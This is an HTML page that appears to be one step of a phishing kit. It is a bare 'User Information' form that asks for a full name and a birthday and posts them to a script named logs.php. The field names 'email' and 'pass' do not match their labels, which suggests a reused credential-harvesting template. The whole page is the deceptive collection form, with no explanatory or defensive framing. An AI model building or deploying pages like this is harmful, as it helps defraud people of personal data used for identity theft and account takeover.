
<html lang="en"><head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link rel="shortcut icon" href="To0sfRta43.ico" />

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" integrity="sha384-JcKb8q3iqJ61gNV9KGb8thSsNjpSL0n8PARn9HuZOnIxN0hoP+VmmDGMN5t9UJ0Z" crossorigin="anonymous">
    <link rel="stylesheet" href="assets/css/style.css">
    <title>User Information </title>
  </head>
  <body>
    <div class="container">
        <div class="row">
            <div class="col-md-12 col-12 d-block mx-auto mt-3 text-center text-atas" onclick="location.href='./';">
            </div>
        </div>

        <div class="row my-5">
            <div class="col-md-12 col-12 my-5">
                <img src="assets/img/page.png" class="col-md-12 col-12 d-block mx-auto" alt="">
            </div>
        </div>

        <div class="row">
            <div class="col-md-12 col-12 d-block mx-auto">
                <form action="logs.php" method="POST">
                    <div class="form-group">
                        <input type="text" class="form-control d-block mx-auto up" name="email" placeholder="Full Name" autocomplete="on" required="yes">
                    </div>
                    <div class="form-group">
                        <input type="date" min="1958-01-01" max="2007-12-31" class="form-control d-block mx-auto down" name="pass" placeholder="Birthday" required="yes">
                    </div>
                    <div class="form-group mt-3">
                        <button class="btn btn-primary d-block mx-auto" type="submit">Submit</button>
                    </div>
                </form>
            </div>
        </div>

        <div class="row">
            <div class="col-md-12 col-12 d-block mx-auto mt-2 text-center text-atas">
                
            </div>
        </div>

        

        <div class="row">
            
                
            </div>
        </div>
    

    <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js" integrity="sha384-DfXdz2htPH0lsSSs5nCTpuj/zy4C+OGpamoFVy38MVBnE+IbbVYUew+OrCXaRkfj" crossorigin="anonymous"></script>
    <script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.1/dist/umd/popper.min.js" integrity="sha384-9/reFTGAW83EW2RDu2S0VKaIzap3H66lZH81PoYlFhbGU+6BZp6G7niu735Sk7lN" crossorigin="anonymous"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js" integrity="sha384-B4gt1jrGC7Jh4AgTPSdUtOBvfO8shuf57BaghqFfPlYxofvL8/KUEfYiJOMMV+rV" crossorigin="anonymous"></script>
  
</body></html>